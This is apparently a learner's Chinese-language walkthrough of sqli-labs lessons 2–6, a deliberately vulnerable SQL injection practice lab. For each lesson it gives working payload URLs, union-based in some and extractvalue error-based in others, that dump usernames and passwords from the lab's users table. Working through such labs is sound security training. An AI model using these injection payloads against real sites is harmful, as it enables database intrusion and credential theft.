sqli-labs-lesson2-6

lesson2

第一课是字符注入,就是php给他加了引号变成了字符
这一个是数值型注入,不需要添加引号, 其他的都一样
http://192.168.154.131/sqli/Less-2/?id=1--
http://192.168.154.131/sqli/Less-2/?id=1 union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

sqli-labs-lesson2-6_第1张图片
lesson2.png

lesson3

使用')闭合
http://192.168.154.131/sqli/Less-3/?id=1') union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

sqli-labs-lesson2-6_第2张图片
lesson3.png

lesson4

使用") 闭合
http://192.168.154.131/sqli/Less-4/?id=1") union select 1,group_concat(username),group_concat(password) from users limit 1,1 --

sqli-labs-lesson2-6_第3张图片
lesson4.png

lesson5

这里没有回显,只能使用报错注入
http://192.168.154.131/sqli/Less-5/?id=1' and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users))) --

sqli-labs-lesson2-6_第4张图片
lesson5.png

但这里显示有限,得多几次显示
http://192.168.154.131/sqli/Less-5/?id=1' and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users where username not in ('Dumb', 'Angelina')))) --

lesson6

双引号报错注入
http://192.168.154.131/sqli/Less-6/?id=1" and 1=extractvalue(1,concat(0x7e,(select group_concat(username, ':', password) from users))) --

sqli-labs-lesson2-6_第5张图片
lesson6.png

部分笔记

sqli-labs-lesson2-6_第6张图片
图片.png

完整笔记等通关就放出来

你可能感兴趣的:(sqli-labs-lesson2-6)